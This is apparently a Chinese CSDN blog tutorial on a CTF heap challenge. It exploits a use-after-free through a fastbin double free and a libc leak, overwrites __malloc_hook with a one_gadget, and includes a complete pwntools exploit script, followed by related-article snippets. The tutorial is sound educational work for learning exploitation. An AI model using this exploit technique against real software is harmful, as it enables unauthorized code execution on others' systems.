[CTF]PWN--堆--UAF漏洞

最新推荐文章于 2024-06-12 22:16:50 发布
最新推荐文章于 2024-06-12 22:16:50 发布
阅读量1k 收藏 25
点赞数 26
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79880752/article/details/136566776
版权

啥是UAF?

UAF即Use After Free

简单的说,Use After Free 就是其字面所表达的意思,当一个内存块被释放之后再次被使用。但是其实这里有以下几种情况

  • 内存块被释放后,其对应的指针被设置为 NULL , 然后再次使用,自然程序会崩溃。
  • 内存块被释放后,其对应的指针没有被设置为 NULL ,然后在它下一次被使用之前,没有代码对这块内存块进行修改,那么程序很有可能可以正常运转
  • 内存块被释放后,其对应的指针没有被设置为 NULL,但是在它下一次使用之前,有代码对这块内存进行了修改,那么当程序再次使用这块内存时,就很有可能会出现奇怪的问题

而我们一般所指的 Use After Free 漏洞主要是后两种。此外,我们一般称被释放后没有被设置为 NULL 的内存指针为 dangling pointer。

Double Free

在学习Double Free之前,需要先去了解一些堆的基本知识

堆的相关数据结构:

https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/heap-structure/

堆的申请与释放:

https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/implementation/malloc/

https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/implementation/free/

前情提要:

我们在调用malloc申请堆块的时候会先检查一个名为__malloc_hook的函数,在查看到其内部为NULL的时候才会正常运转,生成堆块

那有人问了:那如果__malloc_hook函数内不为NULL会如何呢?

当__malloc_hook内存有东西时,程序在申请堆块的时候就会跳转执行__malloc_hook里面的东西

这也是本期我们利用的重点

话又说回来

我们今天学习的利用方法是Double Free,顾名思义,就是对同一个堆块进行两次释放(free)

UAF漏洞存在是因为内存块被释放后,其对应的指针没有被设置为 NULL ,所以我们可以再次使用该堆块

我们可以两次free同一个堆块,又由于fastbins是管理在malloc_state结构体重的一串单向链表,上一个堆块的fd指针指向下一个堆块的地址,因此,我们可以将该堆块再一次申请出来,就可以对其进行修改,把它的fd指针改为malloc hook地址,随后再将malloc hook申请出来,就可以修改malloc hook地址里的东西了,我们可以把one_gadget的地址写入malloc hook,然后再申请一个堆块就会返回到one_gadget获取权限

纸上谈兵无法查验真假,让我们实践一下看看(其实以上理论并完全正确,请看下面实操)

例题(libc-2.23.so)

保护全开,64位,动态编译,IDA查看:

进入menu查看

可以看到,这是一道菜单题,让我们看看每个选项里都有啥

先看Add note,也就是malloc:

总共有两次读入,第一次读入定义堆块的大小,第二次读入填写堆块的内容,就是一个基本的申请堆块的代码

再看Delete note,也就是free:

可以看到,程序在对堆块进行free的时候并没有将其对应的指针设置为 NULL,这就是典型的UAF漏洞

最后是Print note:

主要部分就是一个puts函数,作用是将堆块内的东西打印出来

代码分析完,发现存在UAF漏洞,我们就可以通过double free的手法去获取权限

下面就开始写脚本(第一人称)

为了方便申请堆块,释放堆块以及打印堆块内容,我先是定义了三个函数

def add(i,j):
	p.recvuntil("Your choice :")
	p.sendline(str(1))
	p.recvuntil("Note size :")
	p.sendline(str(i))
	p.recvuntil("Content :")
	p.send(j)

def free(i):
	p.recvuntil("Your choice :")
	p.sendline(str(2))
	p.recvuntil("Index :")
	p.send(str(i))
	
def show(i):
	p.recvuntil("Your choice :")
	p.sendline(str(3))
	p.recvuntil("Index :")
	p.send(str(i))

我先是申请了几个堆块,其中一个堆块大小申请为0x80,这样程序就会给我们一个0x91的堆块,当堆块大小超过0x90的时候,释放的堆块就会进入unshort bin管理器,该堆块的fd与bk指针就会被修改为一个libc地址与一个栈地址,这时候接收一下fd指针上的libc地址,然后在debug界面使用vmmap指令查询到libc基址,随后求出基址与fd指针上的地址偏移,得出基址

脚本如下:

add(0x68,b'a')
add(0x80,b'a')
add(0x68,b'a')

free(1)
show(1)
libc_base=u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))-3951480
print(hex(libc_base))

由于申请的堆块下标由0开始,因此,在free0x80堆块的时候,应该是free(1)

这里有一点需要注意:

申请的0x80大小的堆块不能放在最后,因为当大于0x91的堆块free时与top chunk是贴着的,那么在free之后,这个堆块就不会进入unshort bin里去,而是与top chunk融合在了一起,因此这里我在0x80后又申请了一个0x68的堆块,一来隔绝了0x80与top chunk,二来,在后面使用double free的时候也有作用

接收完libc基址之后,我们就可以得到malloc hook的地址与one_gadget的地址

随后使用double free的手法

连续free两次同一个堆块,再申请一次同样大小的堆块,这样同一个堆块就分成了两个,一个被申请出来了,我们可以修改,还有一个还在fast bin里,我们只需要将malloc hook地址传进被申请出来的那个堆块里,对应的,在fast里的那个堆块内存也会被修改,malloc hook就会被当做堆块存进fast bin,这样一来,我们连续申请,就可以将malloc hook申请出来,我们就可以将one_gadget存进malloc hook里面,随后再申请一个堆块,程序识别到malloc hook里面有东西,就会跳转到one_gadget去执行,获取权限

理论虽是如此,但在调试的时候其实会出现两个问题

其一

我们连续free两次同一个堆块,程序会报错,因此我们无法连续free两次同一个堆块,这是程序本身的机制,与代码无关,那我们要如何去double free呢?其实很简单,只需要在两次free中间,再free一个不同的堆块即可绕过,这就是我上面说的在0x80后申请的0x68的堆块的作用

其二:

在将malloc hook地址传进被申请出来的那个堆块里的时候,其实也是会报错的,这是因为fast bin会检测堆块是否符合其存储大小(0x20~0x80),而malloc hook本身是为NULL的,因此程序会报错,其实这也好绕过,只需要在debug里使用x/32gx查看一下malloc hook上面的地址是什么样的,通常上面会有几个栈地址,而栈地址第一个字节刚好是0x7f,刚好满足fast bin的判断要求,我们计算一下偏移,使偏移后的地址size位刚好为7f即可,在将malloc hook地址传进被申请出来的那个堆块里的时候,改为将其上面那个偏移的地址传进去,在申请出来的时候将偏移填上即可

exp:

from pwn import*
context(os="linux",arch="amd64",log_level="debug")
p=process("./test2")
elf=ELF("./test2")
libc=ELF("/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so")
def bug():
	gdb.attach(p)
	pause()
def add(i,j):
	p.recvuntil("Your choice :")
	p.sendline(str(1))
	p.recvuntil("Note size :")
	p.sendline(str(i))
	p.recvuntil("Content :")
	p.send(j)

def free(i):
	p.recvuntil("Your choice :")
	p.sendline(str(2))
	p.recvuntil("Index :")
	p.send(str(i))
	
def show(i):
	p.recvuntil("Your choice :")
	p.sendline(str(3))
	p.recvuntil("Index :")
	p.send(str(i))

add(0x68,b'a')
add(0x80,b'a')
add(0x68,b'a')

free(1)
show(1)
libc_base=u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))-3951480
print(hex(libc_base))
one_gadget=libc_base+0xf1247
malloc=libc_base+libc.sym['__malloc_hook']

free(0)
free(2)
free(0)
add(0x68,p64(malloc-0x23))
add(0x68,b'a')
add(0x68,b'a')
add(0x68,b'a'*0x13+p64(one_gadget))

bug()

p.recvuntil("Your choice :")
p.sendline(str(1))
p.recvuntil("Note size :")
p.sendline(str(68))

p.interactive()

D0.
关注
  • 26
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
UAF原理及相关一道CTF
qq_36963214的博客
07-27 2666
前言 通过学习UAF原理及其在CTF中的应用,通过理论是实践相结合,可以更好地掌握UAF漏洞UAF漏洞原理 #include<stdio.h> #include<stdlib.h> int main() { char *p1, *p2; p1 = p2 = NULL; p1 = (char *)malloc(10); if (p1 == NULL) { printf("fail to malloc p1"); exit(1); } memcpy(p1, "
安全漏洞--释放重引用(UAF)漏洞分析
关注互联网安全的小虾米一枚
04-26 6496
漏洞简介 未初始化漏洞一般是指栈变量没有设置就使用导致,或者可能更多的是部分初始化导致。 释放后再用漏洞上的数据被释放后,某个残留地址没清除再用导致。其实就是未初始化漏洞。 二 原理分析 windows系统测试代码 #include #include int main(int argc, char * argv[])
CVE2024-1086 nftables UAF漏洞
最新发布
凯峰的日志
06-12 1909
具作者介绍,该漏洞影响从 v5.14(包括)到 v6.6(包括)的版本,但不包括已修补的分支 v5.15.149>、v6.1.76>、v6.6.15>。关闭nf_tables模块只要使用的还是iptables基本就没啥影响,只是新的类似于iptables防火墙功能的nft无法使用而已。一次,而不需要``make clean`.另外编译新内核时候不要使用其他人分享的内核的config编译参数文件,可能会直接系统开不了机,尽量使用内核自带的config编辑。样例用的6.3.13复现该漏洞的提权。
kernel pwn -- UAF
热门推荐
钞sir的博客
07-25 1万+
简介 众所周知,UAF的全称是Use After Free,是一种释放后重用漏洞;之前一直是在用户态下对这个漏洞进行利用学习的,最近想要体验一下在内核环境中利用此漏洞进行提权操作… 用户态的常规UAF可以看这篇文章… 这里我利用的CISCN2017 babydriver来进行学习的,环境我已经放到github上面了,需要的可以自行下载… 前置知识 权限 在Linux当中每个进程都有它自己的权限,而...
linux_pwn(1)--uaf
azraelxuemo的博客
03-04 1182
文章目录What is uafpwn题例题add函数show函数delete函数开始做题准备框架调试attackexp总结 What is uaf use after free 一般可能会有以下的场景 ptr=malloc(0x10) free(ptr) ptr-> 可能写代码不会出现这样的明显错误,但如果多文件呢?可能你这个地方释放了,其他地方还存在引用 所以项目中记住,free之后立刻ptr=NULL pwn题 在ctf里面,一般uaf出题模式就是 在bss开辟了区域,保存了每个heap的地址,
linux内核pwn,Linux Kernel Pwn 学习笔记 (UAF)
weixin_39747087的博客
04-29 315
原标题:Linux Kernel Pwn 学习笔记 (UAF) 本文为看雪论坛优秀文章看雪论坛作者ID:Vinadiak0x01 背景知识UAF漏洞UAF 漏洞是当我们 free 掉某个指针变量所指向的块的时候,未将该指针变量置0,导致该指针依然指着该块地址,当我们引用该指针的话,也就引用该指针所所指向的地址。这个漏洞对于开发者很容易忽略,但威力非常强大。条件竞争:在多线程的环境下,当多个线...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成,例如Web安全、二...
ctf-all-in-one
01-30
ctf-all-in-one
CTF PWN专用虚拟机-附件资源
03-05
CTF PWN专用虚拟机-附件资源
0ctf-2017-pwn-char
02-05
2017年0ctfpwn题,题目质量还是非常高的,要求做题人需要扎实的shellcode编写能力和ROP链构造能力,下面给出wp链接:https://blog.csdn.net/A951860555/article/details/113666423
linux kernel pwn学习之UAF
seaaseesa的博客
02-29 1327
Linux Kernel UAF 与用户态下的glibc差不多,都是对已经释放的空间未申请就直接使用,内核的UAF往往是出现在多线程多进程多文件的情况下。即,假如某个用户程序对用一个内核驱动文件打开了两次,有两个文件描述符,它们都指向了该驱动,又因为是在同一个程序里,所以当我们释放掉其中一个文件描述符后,还可以使用另一个文件描述符来操控驱动。 为了加深理解,我们就以一题为例 ciscn201...
BUUCTF-pwn-hitcontraining_uaf(UAF)
半岛铁盒的博客
06-05 311
这道题可以用来当做的入门题来做 开了NX 这是的菜单;
pwnable.kr题解之uaf
Yale的博客
06-19 577
前言: 这道题目反应了uaf的基本原理,pwn入门必做的题目,如果这一块了解的不够透彻,直接去打现在涉及各种奇技淫巧的pwn,肯定会被绕晕掉。所以为了照顾萌新(其实是我自己菜)把这道题目单独拿出来写一下。 这是一道uaf的题目,把二进制文件拉到本地来研究 在分析前,先简单说一下c++的虚函数和uaf的前置知识 在c++中,如果类中有虚函数,那么这个类就会有一个虚函数表的指针vfptr,而子类会继承。 uaf的原理: 在释放内存后未将指向原内存的指针置为null,use after free的意思就是在释
pwnable.kr之uaf
river
05-26 8212
uaf 终于有时间写一下了,这个题目的答案百度了一下,貌似没有什么特别详细的解答,都是大神们的writeup,可能觉得太简单了,几句话就完事了,而我这种渣渣,只能从头学习,那里不会学哪里。新手可以一起学习一下,如果有兴趣一起学习pwn的可以留言,一起进步, 不扯了,开始正事!   uaf漏洞分析基础知识补充: 1 UAF:引用一段被释放的内存可导致程序崩溃,或处理非预期数值,或执行无干
UAF 实例-RHme3 CTF 的一道题
hl1293348082的专栏
03-30 161
题目来源: https://github.com/xerof4ks/heapwn/tree/master/rhme3 初步了解 的题目基本都是选择菜单,这里可以添加,删除,选择,编辑,展示球员,还可以显示队伍,功能看着很多啊 首先玩玩一下这个游戏,便于后期逆向一些数据结构 上面就是球员这个结构有什么信息,第一个 free slot 就相当于球员的 id,这个不用我们输入 remove 就删除咯 select 会输出球员的信息 edit 当前的 palyer,基于上面的
pwn学习-ctfwiki-UAF
WocW的博客
05-23 2230
源码: #include <stdio.h> #include <stdlib.h> #include <unistd.h> struct note { void (*printnote)(); char *content; }; struct note *notelist[5]; int count = 0; void print_note_co...
pwn】hitcontraining_uaf --利用之uaf
question55的博客
01-12 437
a。
pwn入门08---利用之uaf
weixin_45943522的博客
02-21 1437
use_after_free 原理 简单的说,Use After Free 就是其字面所表达的意思,当一个内存块被释放之后再次被使用。但是其实这里有以下几种情况: 内存块被释放后,其对应的指针被设置为 NULL , 然后再次使用,自然程序会崩溃。 内存块被释放后,其对应的指针没有被设置为 NULL ,然后在它下一次被使用之前,没有代码对这块内存块进行修改,那么程序很有可能可以正常运转。 内存块被释放后,其对应的指针没有被设置为 NULL,但是在它下一次使用之前,有代码对这块内存进行了修改,那么当程序再次使
ctfhub-git泄露stash
09-13
根据引用和引用提供的信息,你可以尝试使用GitHack和dirsearch工具来扫描和利用ctfhub-git的泄露。首先,进入GitHack文件夹,执行命令"python GitHack.py http://challenge-e87e0210287ba7b3.sandbox.ctfhub.com:10800/.git/"来使用GitHack工具进行扫描和利用。同时,你也可以使用dirsearch工具来扫描目录,执行命令"python dirsearch.py -u http://challenge-5a5d24023f7ea71c.sandbox.ctfhub.com:10800 -e git -t 5"来查找ctfhub-git泄露的stash。 然而,需要注意的是,这些工具只是为了帮助你快速发现ctfhub-git的泄露,真正的挖掘过程并不会像这样直接告诉你哪里有泄露,需要自己去尝试和探索。此外,Git这一工具的使用也相当复杂,需要深入学习和实践才能熟练掌握。所以,在学习的道路上还有很长的路要走,希望你能坚持学习,共同进步!
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值